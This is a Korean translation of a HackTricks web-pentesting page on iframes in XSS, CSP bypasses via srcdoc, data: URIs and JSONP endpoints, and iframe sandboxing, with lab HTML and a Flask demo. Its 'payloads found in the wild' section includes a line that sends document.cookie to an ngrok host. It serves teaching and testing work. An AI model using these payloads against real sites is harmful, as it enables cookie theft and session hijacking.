hacktricks/pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md

XSS에서의 Iframes, CSP 및 SOP

htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요!

• 사이버 보안 회사에서 일하시나요? 회사를 HackTricks에서 광고하고 싶으신가요? 아니면 PEASS의 최신 버전에 액세스하거나 HackTricks를 PDF로 다운로드하고 싶으신가요? SUBSCRIPTION PLANS를 확인해보세요!
• The PEASS Family를 발견해보세요. 독점적인 NFTs 컬렉션입니다.
• 공식 PEASS & HackTricks 스웨그를 얻으세요.
• 💬 Discord 그룹 또는 텔레그램 그룹에 참여하거나 Twitter에서 저를 팔로우하세요 🐦@carlospolopm.
• **hacktricks repo 및 hacktricks-cloud repo**로 PR을 제출하여 여러분의 해킹 기법을 공유하세요.

XSS에서의 Iframes

iframed 페이지의 내용을 나타내는 방법은 3가지가 있습니다:

• URL을 나타내는 src를 통해 (URL은 동일 출처 또는 다른 출처일 수 있음)
• data: 프로토콜을 사용하여 내용을 나타내는 src를 통해
• 내용을 나타내는 srcdoc를 통해

부모 및 자식 변수에 접근하기

<html>
<script>
var secret = "31337s3cr37t";
</script>

<iframe id="if1" src="http://127.0.1.1:8000/child.html"></iframe>
<iframe id="if2" src="child.html"></iframe>
<iframe id="if3" srcdoc="<script>var secret='if3 secret!'; alert(parent.secret)</script>"></iframe>
<iframe id="if4" src="data:text/html;charset=utf-8,%3Cscript%3Evar%20secret='if4%20secret!';alert(parent.secret)%3C%2Fscript%3E"></iframe>

<script>
function access_children_vars(){
alert(if1.secret);
alert(if2.secret);
alert(if3.secret);
alert(if4.secret);
}
setTimeout(access_children_vars, 3000);
</script>
</html>

<!-- content of child.html -->
<script>
var secret="child secret";
alert(parent.secret)
</script>

만약 http 서버(예: python3 -m http.server)를 통해 이전의 HTML에 접근하면 모든 스크립트가 실행되는 것을 알 수 있습니다(CSP가 없기 때문입니다). 부모는 어떤 iframe 내부의 secret 변수에도 접근할 수 없으며, 오직 if2와 if3(동일 사이트로 간주됨)만 원래 창의 secret에 접근할 수 있습니다.
if4가 null 출처로 간주되는 것에 주목하세요.

CSP가 있는 Iframes

{% hint style="info" %} 다음 우회 방법에서 iframed 페이지로의 응답에는 JS 실행을 방지하는 CSP 헤더가 없음을 주목하세요. {% endhint %}

script-src의 self 값은 data: 프로토콜이나 srcdoc 속성을 사용한 JS 코드 실행을 허용하지 않습니다.
그러나 CSP의 none 값은 src 속성에 URL(전체 또는 경로만)을 넣은 iframes의 실행을 허용합니다.
따라서 페이지의 CSP를 우회할 수 있습니다:

<html>
<head>
<meta http-equiv="Content-Security-Policy" content="script-src 'sha256-iF/bMbiFXal+AAl9tF8N6+KagNWdMlnhLqWkjAocLsk='">
</head>
<script>
var secret = "31337s3cr37t";
</script>
<iframe id="if1" src="child.html"></iframe>
<iframe id="if2" src="http://127.0.1.1:8000/child.html"></iframe>
<iframe id="if3" srcdoc="<script>var secret='if3 secret!'; alert(parent.secret)</script>"></iframe>
<iframe id="if4" src="data:text/html;charset=utf-8,%3Cscript%3Evar%20secret='if4%20secret!';alert(parent.secret)%3C%2Fscript%3E"></iframe>
</html>

이전 CSP는 인라인 스크립트의 실행만 허용합니다.
그러나 if1과 if2 스크립트만 실행되지만 if1만 부모의 비밀에 액세스할 수 있습니다.

따라서, JS 파일을 서버에 업로드하고 script-src 'none'을 통해 iframe을 통해 로드할 수 있다면 CSP를 우회할 수 있습니다. 이는 동일 사이트 JSONP 엔드포인트를 악용하여 가능합니다.

다음 시나리오로 이를 테스트할 수 있습니다. script-src 'none'으로 인해 쿠키가 도난당합니다. 애플리케이션을 실행하고 브라우저로 액세스하십시오:

import flask
from flask import Flask
app = Flask(__name__)

@app.route("/")
def index():
resp = flask.Response('<html><iframe id="if1" src="cookie_s.html"></iframe></html>')
resp.headers['Content-Security-Policy'] = "script-src 'self'"
resp.headers['Set-Cookie'] = 'secret=THISISMYSECRET'
return resp

@app.route("/cookie_s.html")
def cookie_s():
return "<script>alert(document.cookie)</script>"

if __name__ == "__main__":
app.run()

야생에서 발견된 다른 페이로드

<!-- This one requires the data: scheme to be allowed -->
<iframe srcdoc='<script src="data:text/javascript,alert(document.domain)"></script>'></iframe>
<!-- This one injects JS in a jsonp endppoint -->
<iframe srcdoc='<script src="/jsonp?callback=(function(){window.top.location.href=`http://f6a81b32f7f7.ngrok.io/cooookie`%2bdocument.cookie;})();//"></script>
<!-- sometimes it can be achieved using defer& async attributes of script within iframe (most of the time in new browser due to SOP it fails but who knows when you are lucky?)-->
<iframe src='data:text/html,<script defer="true" src="data:text/javascript,document.body.innerText=/hello/"></script>'></iframe>

Iframe sandbox

Iframe 내의 콘텐츠는 sandbox 속성을 사용하여 추가 제한을 받을 수 있습니다. 기본적으로 이 속성은 적용되지 않으므로 제한이 없습니다.

sandbox 속성을 사용하면 다음과 같은 제한이 적용됩니다:

• 콘텐츠는 고유한 출처에서 비롯된 것으로 처리됩니다.
• 양식 제출 시도가 차단됩니다.
• 스크립트 실행이 금지됩니다.
• 특정 API에 대한 액세스가 비활성화됩니다.
• 링크가 다른 브라우징 컨텍스트와 상호 작용하는 것을 방지합니다.
• <embed>, <object>, <applet> 또는 유사한 태그를 통한 플러그인 사용이 허용되지 않습니다.
• 콘텐츠 자체에 의한 최상위 브라우징 컨텍스트의 탐색이 방지됩니다.
• 비디오 재생이나 양식 컨트롤의 자동 초점 설정과 같이 자동으로 트리거되는 기능이 차단됩니다.

속성의 값은 모든 제한을 적용하려면 비워둘 수 있습니다 (sandbox=""). 또는 특정 제한에서 iframe을 제외하려면 공백으로 구분된 값의 목록으로 설정할 수 있습니다.

<iframe src="demo_iframe_sandbox.htm" sandbox></iframe>

SOP에서의 Iframes

다음 페이지를 확인하세요:

{% content-ref url="../postmessage-vulnerabilities/bypassing-sop-with-iframes-1.md" %} bypassing-sop-with-iframes-1.md {% endcontent-ref %}

{% content-ref url="../postmessage-vulnerabilities/bypassing-sop-with-iframes-2.md" %} bypassing-sop-with-iframes-2.md {% endcontent-ref %}

{% content-ref url="../postmessage-vulnerabilities/blocking-main-page-to-steal-postmessage.md" %} blocking-main-page-to-steal-postmessage.md {% endcontent-ref %}

{% content-ref url="../postmessage-vulnerabilities/steal-postmessage-modifying-iframe-location.md" %} steal-postmessage-modifying-iframe-location.md {% endcontent-ref %}

AWS 해킹을 처음부터 전문가까지 배우세요 htARTE (HackTricks AWS Red Team Expert)!

• 사이버 보안 회사에서 일하시나요? 회사를 HackTricks에서 광고하거나 PEASS의 최신 버전에 액세스하거나 HackTricks를 PDF로 다운로드하고 싶으신가요? SUBSCRIPTION PLANS를 확인하세요!
• The PEASS Family를 발견하세요. 독점적인 NFT 컬렉션입니다.
• 공식 PEASS & HackTricks 스웨그를 얻으세요.
• 💬 Discord 그룹 또는 텔레그램 그룹에 참여하거나 Twitter에서 저를 팔로우하세요 🐦@carlospolopm.
• **hacktricks repo와 hacktricks-cloud repo**에 PR을 제출하여 여러분의 해킹 기법을 공유하세요.